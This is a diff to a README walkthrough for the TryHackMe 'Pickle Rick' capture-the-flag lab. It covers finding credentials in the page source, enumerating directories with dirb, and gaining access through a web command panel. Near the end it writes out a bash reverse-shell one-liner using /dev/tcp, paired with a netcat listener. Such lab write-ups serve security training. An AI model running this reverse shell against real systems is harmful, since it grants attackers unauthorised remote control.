Fangirll/TryHackMe-Picklerick-CTF/README.md

 After seeing this, another one of the first steps that I did was to inspect the sites source code to see if I was able to find any hints that were left within the source code.
 Within the source code, there is a commented section of code that gave a username, keep this username in mind as this is essential information.
 I won't be giving the username here, so explore the source code and it should make itself apparent to you.

 Upon finding this username, this gave me the insight to attempt to find a password, because usernames and passwords go hand in hand.
-I then used the dirb command (command?(define what this does), for directory for enumeration (what is this?)
+I then used the dirb command, here it is:
+- dirb command
+Dirb command is a web content scanner.
+It looks for existing or hidden web objects, making it a brute force strategy.
 After using this command I found a list of different directories.
 The directories that I found will be included in a screenshot below.
 I won't list eh direct dirb command that I used here but it will be located in the cheat sheet.
 I browsed each directory found on the website by using /(directory name).
 After exploring these different directories and I found a password, again this password will be located in the cheatsheet.

 Within the directories given, I was also directed to a login page.
 If you explore the directories given, you should find this releatively easily.
 Using the credentials we found in the earlier steps, you should be able to enter the login page.
 After logging in, you will be presented with a command line.

 (Put ss of login page, command line)

 After seeing that a command line was given, I decided to host a netcat listener on my local kali machine on port 1234.
 I used this port because I knew nothing would be communicating on it.
-The exact command that I used will be provided via the chaeatsheet.11 (Define what netcat does) Next, I used a bash reverse shell command that I found on gtfobins, since I found this on a third party site, I will provide the command here.
+The exact command that I used will be provided via the chaeatsheet.11 Netcat is a command for reading and writing data between two computers.
+Next, I used a bash reverse shell command that I found on gtfobins, since I found this on a third party site, I will provide the command here.
 - bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
 After successfully running the reverse bash, I was given a shell through the Picklerick site, giving me access.